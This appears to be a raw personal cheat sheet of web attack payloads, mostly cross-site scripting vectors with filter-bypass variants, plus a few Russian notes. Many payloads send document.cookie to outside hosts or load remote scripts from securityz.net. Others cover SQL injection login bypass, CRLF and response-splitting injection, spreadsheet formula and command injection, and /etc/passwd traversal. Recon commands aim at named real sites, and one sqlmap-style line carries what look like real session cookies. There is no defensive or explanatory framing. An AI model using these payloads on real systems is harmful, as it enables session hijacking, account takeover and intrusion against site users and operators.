email = ‘ or ‘1’=’1
password = ‘ or ‘1’=’1
<script>alert('1');</script>
<script type='text/javascript'>alert('1');</script>
"><script>alert('1')</script>
<script>alert('1');</script>
'';!--"<fuck>=&{()}
<sc<script>ript>alert()</sc</script>ript>
"> http://******.ru/trye.asp?sessionID="><IMG%20SRC="javascript:alert();
http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script>
<script language="JavaScript">
document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%66%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74%2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%73%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
</script>
var іmg = new Image(); іmg.srс = 'http://site/xss.php?' + document.cookie;
<script>document.write('<iframe src="http://evilattacker.com?cookie='
    + document.cookie.escape() + '" height=0 width=0 />');</script>
<div>привет</div>
<SCRIPT SRC=http://xss.rocks/xss.js></SCRIPT>
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
<img src="javascript:alert('hello everybody')"></img>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
<p>Your search for 'flowers <script>evil_script()</script>'
http://www.bigsafebank.com/search.asp?q=<script>x=new Image;x.src =
http://maliciousdomain~~~/hijackedsession.php?sessioncookie=”+document.co
okie;</script>
<b onmouseover=alert(‘XSS testing!‘)></b>
<img src="http://url.to.file.which/not.exist" onerror=alert(document.cookie);>
<IMG SRC=j&#X41vascript:alert('test2')>
 <script>
    var params = 'type=topic&action=delete&id=347';
    var http = new XMLHttpRequest();
    http.open('POST', 'forum.com/admin_control.php', true);
    http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    http.setRequestHeader("Content-length", params.length);
    http.setRequestHeader("Connection", "close");
    http.onreadystatechange = function() {
        if(http.readyState == 4 && http.status == 200) {
            // Do something else.
        }
    };
    http.send(params);
 </script>
<SCRIPT type="text/javascript">
var adr = '../evil.php?cakemonster=' + escape(document.cookie);
</SCRIPT>
---------------------------------------------------------------------------------------------------

Еще

"><script>alert()</script>
<script>alert('xss')</script>
"><script>alert(/xss/)</script>
"><script>alert(/xss/)</script>
"><script>alert(document.cookie)</script>
<iframe src="https://securityz.net" width="100%" height="300">

<iframe src="https://securityz.net/iu.html" width="100%" height="300"></iframe>

"><script>alert(document.cookie)</script>

<FRAMESET><FRAME SRC="javascript:alert(1);"></FRAMESET>
<TABLE BACKGROUND="javascript:alert(1)">
<TABLE><TD BACKGROUND="javascript:alert(1)">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<BASE HREF="javascript:alert('XSS');//">

Browser version

<!--[if gte IE 4]>
 <SCRIPT>alert('XSS');</SCRIPT>
 <![endif]-->

Inside .SWF XSS

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);


<OBJECT TYPE="text/x-scriptlet" DATA="https://securityz.net/index.html"></OBJECT>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<SCRIPT a=">" SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT =">" SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="https://securityz.net/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="https://securityz.net/xss.js"></SCRIPT>

<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="http://66.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">




<svg><x><script>alert&#40;1&#41</x>
<svg><x><script>alert&#40;&#39;1&#39;&#41</x>
<svg onload=window.onerror=alert;throw/1/;//"/>
<img src=x onerror=while(true){prompt(1)}>
<iframe src=""/srcdoc='&lt;svg onload&equals;alert&lpar;1&rpar;&gt;'>
<!--<img src="--><img src=x onerror=alert(1)//">
<svg id=javascript:alert(1) onload=location=id>
<svg id=alert(1) onload=eval(id)>
<img src=x:alert(alt) onerror=eval(src) alt=xwx>
<body/onpageshow=(alert)(1)>
<svg id=alert(1) onload=eval(id)>
<svg onload=(alert)(1) >
"><frameset onload=alert(1)>

/*To bypass input values*/

"autofocus/onfocus="alert &#40/1&#41
onfocus=onfocus=\u0061lert(1) autofocus
autofocus onfocus=window.onerror=alert;throw/1/;//

xxxx'"<img src=1 onerror=alert() a
<<script>script<script>>alert(/xss/);</script%20>

javascript:alert(/hello world/);//
javascript%3aalert%28%2fhello+world%2f%29%3b%2f%2f
group_name');alert(document.cookie);//
</title></script/"-alert(0)-"-->"><svg/onload
%3C/title%3E%3C/script/%22-alert%280%29-%22--%3E%22%3E%3Csvg/onload=prompt%28document.domain%29%3E



/*Bypass filtration "script/alert"*/




				'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>
<script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script>
<script>alert(document.cookie)</script>">
<img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id)>'">
<img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg">



<script>$=1,alert($)</script>
<script ~~~>confirm(1)</script ~~~>
<script>$=1,\u0061lert($)</script>
<</script/script><script>eval('\\u'+'0061'+'lert(1)')//</script>
<</script/script><script ~~~>\u0061lert(1)</script ~~~>
</style></scRipt><scRipt>alert(1)</scRipt>
<mArquee%20onStart%3D[~[onmouseleave(([[(alert(1))]]))]]%20]
<svg><script /* /*/*/*>\u0061l\u0065rt`X`</x+x
OR
<svg><script booogus>\u0061l\u0065rt`X`</script>
OR
<svg><script /* /*/*/*>\u0061l\u0065rt`X`<

<img ismap='xxx' itemtype='yyy style=width:100%;height:100%;position:fixed;left:0px;top:0px; onmouseover=alert(/XSS/)//'>



<link rel=import href=https:securityz.net/test.swf


/*tougher policy on the html tags*/

<h1 onmouseover=alert&lpar;1&rpar;>xwx
<h1/onmouseover='\u0061lert(1)'>xwx
<marquee/onstart=alert(1)>xwx
<div/onmouseover='alert(1)'>xwx
<h1/onmouseover='alert(1)'>xwx
<h1 onmouseover='alert(1)'>xwx
<p onmouseover='alert(1)'>xwx
<p/onmouseover='alert(1)'>xwx
<plaintext/onmouseover=prompt(1)>

/*Classic very popular vector*/

<script>alert(1)</script>
</script><img src=x onerror=alert(1);>
</script><iframe/onload=alert(1)>
<img src=x onerror=alert(1);>
<style ONLOAD=prompt(1)>
<iframe/onload=alert(1)>
<svg/onload=prompt(1)>
<svg onload=alert(1)>

"style=background:black; onmouseover=alert(1)"
"autofocus/onfocus="alert(1)
"onmouseover="alert(1);"
"/onmouseover= alert(1)>
"onload="alert(1)""


/*HTML5 popular vectors*/

<video/poster/onerror=alert(1)>
<video><source onerror="javascript:alert(1)">
<video onerror="javascript:alert(1)"><source>
<audio onerror="javascript:alert(1)"><source>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<form><button formaction="javascript:alert(1)">


/*data:text*/
data:text/plain,alert('xwx')
data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==

/*Bonus Dom Based Xss wector for popular WordPress plugin Prettyphoto*/

#!prettyPhoto/2,<a onclick="alert(1);">/		                /*firefox*/
#prettyPhoto[gallery]/1,<a onclick="alert(1);">/                  /*firefox*/
#prettyPhoto[rmsg0d]/2,<img src=x onerror=alert(1)>/	/*firefox*/

#prettyphoto[pp_gal]/2,<img src=1 onerror=alert(1)>	       /*Only Google chrome*/

</div></article>"><script src=https://securityz.net/xss.js></script>

<div id="form_purpose" class="info_panel purpose"><div class="box"><div

<SCRIPT SRC="https://security.net/xss.jpg"></SCRIPT>

<SCRIPT SRC=//securityz.net/t.j>


"><script src=https://securityz.net/t.js></script></script>

<meta http-equiv="refresh" content="1;URL=https://securityz.net?moyo=4" />

<meta refresh="0;https://securityz.net/">


*/--></script></title></textarea></noscript></style></xmp></noembed></comment></xml></iframe><script src=https://securityz.net/moyo.js></script></script>

&t;<script src=http://securityz.net/xss.js4567></script>&t;

&lt<script src=//47;&#47;vk.co/#47;&gt;&lt;&#></script>gt;

&lt<script src=//kkkkkkkkvk.co/kkkkkkkkkkkktkkk></script>;

"&ltgtt<script>alert(1)</script>gttltuuuu;


&lt<script src=https://kkvk.co/kkkkkkkkkkkkt.js></script>;

javascript:alert(1)
qt=';alеrt();var a = '
'),alert('1234

\"</script><script>alert(1);<!--
%22);alert(1);<!--
[[a|""onload="alert(1)"]]
[[a|http://onload='alert(1)']]
Comment#--><script>alert(1)</script>
'#';alert(1)//
");([]['\163\157\162\164']['\143\157\156\163\164\162\165\143\164\157\162'])('\141\154\145\162\164(1)')()//


<img src='1231231' onerror='alert("hacked")'/>



");confirm("1
\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex
"><plaintext/onmouseover=prompt(1)>
<x~%0Aonmouseover=alert(1)>hek       (IE)
'><script>alert(document.cookie)</script>

<script>alert(1)</script>
"><b><h1><i><s>hello

"></script><iframe/onload=alert(1)>
"--></style></scRipt><scRipt>alert(String.fromCharCode(72, 101, 108, 108, 111, 32, 88, 115, 115))</scRipt>
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp><img src=1 onerror=alert(1)>'
"></textarea><script>alert(/XSS/)</script>
"><img src=1 onerror=alert(1);>
/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp><img src=1 onerror=alert(1)>'
/../../../etc/passwd%)

<a href="<script>alert('1')</script>" title="test">

<script>prompt(2)</script>

"/src='http://securityz.net/evil.js'"

/?aaaa=111111111&=&#bb"><img src=1 onerror=alert(1);>bbb=222222222

#<img src=x onerror=alert(0)>

<a onclick="alert(1);">/

<a onclick="alert(1);">

#data:text/plain,alert(1)

/'-alert(1)-'


\";alert(1);//

'';!--"<xss>=&{()}

q=;//

"><p><img onerror="prompt(888)" src=x.jpg"/></p>
"><iframe/onload=alert(document.domain)>
"><img src=1 onerror=alert(888);>

#message=alert(0)

<p>qw{{2+2}}qw</p> <p>"><iframe/onload=alert(document.domain)><a title="http://"><iframe/onload=alert(document.domain)>" href="http://"><iframe/onload=alert(document.domain)>" target="_blank" rel="nofollow" rel="nofollow">"><iframe/onload=alert(document.domain)></a></p>

<IMG SRC="jav&#x0D;ascript:alert(0);">
<IMG SRC="jav&#x0A;ascript:alert(1);">
<IMG SRC="jav&#x0D;ascript:alert(1);">
<IMG SRC="jav	ascript:alert(1);">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<img src=x onerror="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG onmouseover="alert(1)">
<IMG SRC= onmouseover="alert(1)">
<IMG SRC=# onmouseover="alert(0)">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG """><SCRIPT>alert(1)</SCRIPT>">
<IMG SRC=`javascript:alert("ghghg, 'tt'")`>
<IMG SRC=javascript:alert("qwee")>
<IMG SRC=JaVaScRiPt:alert(1)>
<IMG SRC=javascript:alert(1)>
<IMG SRC="javascript:alert(1);">

&quot;&gt;&lt;script&gt;alert(document.domain)&lt;/script&gt;
&quot;&gt;&lt;img src=x onerror=prompt(1)&gt;
"%3e%3cb%20onbeforescriptexecute=prompt(document.domain)%3e
&#x22;&#x3e;&#x3c;&#x69;&#x6d;&#x67;&#x20;&#x73;&#x72;&#x63;&#x3d;&#x78;&#x20;&#x6f;&#x6e;&#x65;&#x72;&#x72;&#x6f;&#x72;&#x3d;&#x70;&#x72;&#x6f;&#x6d;&#x70;&#x74;&#x28;&#x31;&#x29;&#x3e;&#x0a;

%22%3e%3c%69%6d%67%20%73%72%63%3d%78%20%6f%6e%65%72%72%6f%72%3d%70%72%6f%6d%70%74%28%31%29%3e%71%77%7b%7b%32%2b%32%7d%7d%71%77

%25%32%32%25%33%65%25%33%63%25%36%39%25%36%64%25%36%37%25%32%30%25%37%33%25%37%32%25%36%33%25%33%64%25%37%38%25%32%30%25%36%66%25%36%65%25%36%35%25%37%32%25%37%32%25%36%66%25%37%32%25%33%64%25%37%30%25%37%32%25%36%66%25%36%64%25%37%30%25%37%34%25%32%38%25%33%31%25%32%39%25%33%65%25%37%31%25%37%37%25%37%62%25%37%62%25%33%32%25%32%62%25%33%32%25%37%64%25%37%64%25%37%31%25%37%37

test%0dSet-Cookie:crlf=injection;domain=.mail.ru;




«><script >alert(document.cookie)</script>
«><ScRiPt>alert(document.cookie)</ScRiPt>
«%3cscript%3ealert(document.cookie)%3c/script%3e
» onfocus=»alert(document.cookie)
<SCRIPT a=»>» SRC=»https://securityz.net/xss.js»></SCRIPT>
<script>window.onload = function() {var AllLinks=document.getElementsByTagName(«a»);
AllLinks[0].href = «http://badexample.com/malicious.exe»; }</script>
</script><svg+onload=alert(1)>


<script>prompt(2)</script>

"><img src=x onerror=prompt(document.domain)>


"><img src=x onerror=alert(1)>
"><img src=x onerror=prompt(1)>qw{{2+2}}qw

<b>ghgh</b>
"><img src=x onerror=prompt(/OPENBUGBOUNTY/)>


</style></div></article></script>"><script src=https://securityz.net/1.js?></script>
\"-->'><img src=1 onerror="var script =document.createElement('script');script.src ='//securityz.net/1.js'; document.body.appendChild(script);">
"><svg/onload="var script =document.createElement('script');script.src ='//securityz.net/1.js'; document.body.appendChild(script);">
<meta http-equiv="refresh" content="1;URL=https://securityz.net/blind.html?puzzle-movies" />
"><img src="https://securityz.net/blindxss.jpg">

"><script src=https://securityz.net/1.js?></script>  <meta http-equiv="refresh" content="1;URL=https://securityz.net/blind.html" />

<ololo="/q="s>"/ondblclick=<[confir\u006d`0`]>hek


<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>


/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfunctio%gn=confirm`1`
/wp-includes/js/plupload/plupload.flash.swf?target%g=alert&uid%g=XSS&


</script>"><script src=https://securityz.net/1.js?></script>
<meta http-equiv="refresh" content="1;URL=https://securityz.net/blind.html?puzzle-movies" />


<script src=//14.rs>

alert(dfdffd)         data:text/html;base64,PHNjcmlwdD5wcm9tcHQoJ09QRU5CVUdCT1VOVFknKTwvc2NyaXB0Pg==#

=HYPERLINK("https://maliciousDomain.com/evil.html?data="&A1, "Click to view additional information")
=cmd|' /C calc'!A0

<IMG SRC=//securityz.net/lambo.png onerror="alert(String.fromCharCode(88,83,83))"></img>

'" /Autofocus /Onfocus=confirm`1` /

'"</Script><Html Onmouseover=(alert)(1) //

1/"--!><Svg/Onload=confirm`1`>"

"><body onpageshow=alert`1`>

<!'/*"/*\'/*\"/*--></Script><Image SrcSet=K */; OnError=confirm`OPENBUGBOUNTY` //>

"></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>


</script>"><script src=https://securityz.net/x.js?></script>


http://privatmarket-dev-2.test.it.loc/privatmarket/test_fotos.xml


iv id="form_purpose" class="info_panel purpose"><div class="box"><div

test'-)/9
python /root/sublist3r.py -v -d site.com
dirb https://site.com /usr/share/dirb/wordlists/big.txt

"><img src=1 onerror=alert('fuck');>
"><b><h1><i><s>hello

"><img src=1 onerror=alert(document.domain);>

<img ismap='xxx' itemtype='yyy style=width:100%;height:100%;position:fixed;left:0px;top:0px; onmouseover=alert(/XSS/)//'>

#!\;'prompt(document.domain);//

/%08/evil.com

$(sleep 20)

<a href="#" onClick="alert(document.domain)"><img title="Click me" /></a>

%0dSet-Cookie:xxx=xwx
%0aSet-Cookie:xxx=xwx

%0a%0d

&url=https:///XSSPosed:1 Cont ent-Type:text/html Content-Length:39 <script>alert('fuck')</scrip t>/

<meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>

%22});});});prompt(document.domain);% 24('%23dynamicnav a').each(function(i){$(this).click(function(event){x({y:%22 😯

<meta http-equiv="refresh" content="1;URL=https://securityz.net" />

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

<meta refresh="5;https://merchant.webmoney.ru/">


<script>document.location.href = 'https://securityz.net';</script>

?clickTAG=https://securityz.net

Flash vulnerability

?HtmlVariable=<a+href="javascript:alert(document.domain)">XSS!</a>

/FlashBanner.swf?username=<a+href="javascript:alert("XSS")

/FlashBanner.swf?clickTAG=javascript:alert(1)

/swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//

/swf?userinput1=javascript:alert(1)

/swf?js=alert(document.domain);

getURL("javascript:alert('Hacked by me!')")

?link1=javascript:alert(document.domain)
?displayclick=link&link=data:text/html;base64,Ij48L3NjcmlwdD48aWZyYW1lL29ubG9hZD1hbGVydChkb2N1bWVudC5kb21haW4pPg==&file=1.jpg

-----------------------------------------------------------


alert(dfdffd)         data:text/html;base64,PHNjcmlwdD5wcm9tcHQoJ09QRU5CVUdCT1VOVFknKTwvc2NyaXB0Pg==#

document.domain       data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+

https://www.privat24.ua/?srvc_id=vsrvs3&go=%2Fp24api%2Fishop%3Fpid%3D18366508%26mid%3D49#login

file:///etc/passwd



-u "https://topvisor.ru/project/keywords/322661/" --data="text=1&action=." --cookie="__utma=87358877.98777352.1434625937.1438446709.1438457925.6; __utmb=87358877.6.10.1438457925; __utmc=87358877; __utmt=1; __utmz=87358877.1434625937.1.1.utmcsr=serprating.ru|utmccn=(referral)|utmcmd=referral|utmcct=/adding.html; auth=43992_4b6538a44a1dfdc2b83477cd76dee98ee0e6518d2cac6a5b1fa6b05498a5e7be; topvisor=1jqup3b1r75g83ngia11rmn376"

python /root/sublist3r.py -v -d pb.ua


<script src="http://securityz.net/xss.js">


<script>img = new Image(); img.src = "http://zuttu.ru/images/qiece_1.gif?"+document.cookie;</script>
<img src="https://securityz.net/lambo.png?">
javascript:document.write('<script>img = new Image(); img.src = "http://zuttu.ru/images/qiece_1.gif?"+document.cookie;</script>')


<figcaption class="wp-caption-text"><a href="</figcaption></figure></a><a href=" onClick='alert(1)' "></a>

/wp-includes/js/plupload/plupload.flash.swf?target%g=alert&uid%g=XSS&
/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfunctio%gn=confirm`1`


<script src='https://securityz.net/t.js'></script>

%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20O\
2 K%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2\
3 019%0d%0a%0d%0a<html>deface</html>

http://yandex.ru%00aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa



"><script src=https://securityz.net/1.js?></script></script>
"><svg/onload="var script =document.createElement('script');script.src ='//securityz.net/1.js'; document.body.appendChild(script);">
<meta http-equiv="refresh" content="1;URL=https://securityz.net?site1" />
<img src="https://securityz.net/lambo.png?site1">





<html>
<head>
<style>
div  {
    background-image: url("data:image/jpg;base64,<\/style><svg/onload=alert(document.domain)>");
    background-color: #cccccc;
}
</style>
</head>
<body>

<div>lol</div>

</body>
</html>